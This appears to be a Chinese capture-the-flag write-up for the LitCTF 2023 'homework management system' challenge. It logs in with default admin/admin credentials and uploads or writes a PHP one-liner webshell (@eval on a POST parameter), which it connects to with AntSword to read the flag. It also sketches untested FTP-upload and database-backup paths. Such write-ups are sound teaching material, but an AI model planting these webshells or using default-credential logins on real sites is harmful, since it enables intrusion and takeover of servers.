[LitCTF 2023]作业管理系统

[LitCTF 2023]作业管理系统

信息搜集

进来发现要登录：

但是别着急，先查看源码或者抓个包：

可以看到源码中给出了提示：默认账户admin admin 。

账户名：admin，密码：admin，成功登录。

注入点

本题的注入点很多，进入页面，首先就能看到一个上传文件和创建文件：

注入点一：文件上传

上传一个名为 eval.php 的文件，文件内容为：

BM
<?php @eval($_POST['shell']);?>

发现没有做任何过滤，直接上传成功了：

蚁剑直接连：

最后在根目录下找到 flag 。

注入点二：创建文件直接写马

文件名：shell.php

创建文件后选择编辑文件，写入一句话木马并保存：

蚁剑直接连：

注入点三：ftp 远程文件上传

这个注入点只是理论上，因为本人没有实践过。

首先需要一台能被公网访问的服务器，搭建好 ftp 服务，注意做好安全防护，比如禁止匿名登录啥的。

然后在 FTP 地址一栏填入自己服务器的 IP ，端口为 21 。用户名和密码填入自己设置的 ftp 用户名和密码。

点击远程上传，理论上可以得到这个上传的 zip 文件，估计是源码。

（理论，勿喷，不当请指出）

注入点四：获取数据库备份文件

这个也是理论上可行，但是可能是因为环境问题而报错了，所以最后讲。

将想要获取的数据库名称写上去，然后下面来个万能密码或者弱密码爆破（假设能成功的话进入下一步）。

点击备份，然后在网站根目录访问 mysql.zip 就可以下载了。

但是我这里在点击备份的时候报错：

所以没办法下一步了。